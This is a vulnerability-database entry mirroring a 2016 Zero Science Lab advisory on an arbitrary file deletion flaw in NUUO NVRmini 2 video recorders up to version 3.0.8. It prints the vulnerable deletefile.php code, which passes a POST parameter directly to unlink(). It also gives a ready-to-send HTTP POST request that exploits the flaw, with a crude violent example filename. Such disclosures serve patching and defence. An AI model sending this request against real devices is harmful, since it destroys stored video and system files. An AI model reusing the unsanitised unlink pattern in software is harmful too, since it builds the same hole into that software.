ID
VAR-E-201608-0131
EDB ID
40214
TITLE
NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion - PHP webapps Exploit
Trust: 0.6
DESCRIPTION
NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion.. webapps exploit for PHP platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | nuuo | model: | nvrmini | scope: | eq | version: | 23.0.8 | Trust: 1.6 |
| vendor: | nuuo | model: | arbitrary | scope: | eq | version: | 3.0.8 | Trust: 0.5 |
EXPLOIT
NUUO Arbitrary File Deletion Vulnerability
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.
==================================================================
/deletefile.php:
----------------
1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php
14.01.2016
--
POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
filename=He_molested_murdered_and_mutilated_her.mp4
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Arbitrary File Deletion
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
CREDITS
LiquidWorm
Trust: 0.6
EXTERNAL IDS
| db: | ZSL | id: | ZSL-2016-5353 | Trust: 2.7 |
| db: | EXPLOIT-DB | id: | 40214 | Trust: 1.6 |
| db: | EDBNET | id: | 87253 | Trust: 0.6 |
| db: | EDBNET | id: | 87242 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 138225 | Trust: 0.5 |
REFERENCES
| url: | http://www.zeroscience.mk/en/vulnerabilities/zsl-2016-5353.php | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/40214/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 138225 |
| db: | EXPLOIT-DB | id: | 40214 |
| db: | EDBNET | id: | 87253 |
| db: | EDBNET | id: | 87242 |
LAST UPDATE DATE
2022-07-27T10:02:57.890000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 138225 | date: | 2016-08-06T19:09:20 |
| db: | EXPLOIT-DB | id: | 40214 | date: | 2016-08-06T00:00:00 |
| db: | EDBNET | id: | 87253 | date: | 2016-08-07T00:00:00 |
| db: | EDBNET | id: | 87242 | date: | 2016-08-07T00:00:00 |